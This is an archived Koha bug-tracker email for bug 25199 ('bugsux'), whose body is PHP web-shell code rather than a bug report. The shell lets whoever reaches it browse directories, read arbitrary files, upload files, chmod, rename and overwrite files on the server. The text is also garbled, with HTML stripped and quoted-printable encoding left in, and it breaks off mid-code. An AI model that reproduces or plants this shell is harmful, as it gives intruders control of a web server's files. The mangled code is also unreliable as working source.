From bugzilla-daemon@bugs.koha-community.org Mon Apr 20 07:15:03 2020 From: bugzilla-daemon@bugs.koha-community.org To: koha-bugs@lists.koha-community.org Subject: [Koha-bugs] [Bug 25199] New: bugsux Date: Mon, 20 Apr 2020 05:15:02 +0000 Message-ID: MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="===============7833753764754090837==" --===============7833753764754090837== Content-Type: text/plain; charset="utf-8" Content-Transfer-Encoding: quoted-printable https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=3D25199 Bug ID: 25199 Summary: bugsux Change sponsored?: --- Product: Koha Version: 19.05 Hardware: All OS: All Status: NEW Severity: enhancement Priority: P5 - low Component: Authentication Assignee: koha-bugs@lists.koha-community.org Reporter: dirajadanu@gmail.com QA Contact: testopia@bugs.koha-community.org CC: dpavlin@rot13.org $value){ $_POST[$key] =3D stripslashes($value); } } echo '

BlackHT Ganzz | 404rgr '; if(isset($_GET['filesrc'])){ echo "
files >> '; if(isset($_GET['path'])){ $path =3D $_GET['path']; }else{ $path =3D getcwd(); } $path =3D str_replace('\\','/',$path); $paths =3D explode('/',$path); foreach($paths as $id=3D>$pat){ if($pat =3D=3D '' && $id =3D=3D 0){ $a =3D true; echo '/'; continue; } if($pat =3D=3D '') continue; echo ''.$pat.'/'; } echo '
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo 'upload berhasil!
'; }else{ echo 'upload gagal!
'; } } echo '
upload
files >> "; echo $_GET['filesrc']; echo '

'; echo('
'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'
'); }elseif(isset($_GET['option']) && $_POST['opt'] !=3D 'delete'){ echo '
'.$_POST['path'].'

'; if($_POST['opt'] =3D=3D 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],$_POST['perm'])){ echo 'change permission berhasil!
'; }else{ echo 'change permission gagal!
'; } } echo '
Permission :
'; }elseif($_POST['opt'] =3D=3D 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo 'change name berhasil!
'; }else{ echo 'change name gagal!
'; } $_POST['name'] =3D $_POST['newname']; } echo '
New Name :
'; }elseif($_POST['opt'] =3D=3D 'edit'){ if(isset($_POST['src'])){ $fp =3D fopen($_POST['path'],'w'); if(fwrite($fp,$_POST['src'])){ echo 'edit berhasil!
'; }else{ echo 'edit gagal bro
'; } fclose($fp); } echo '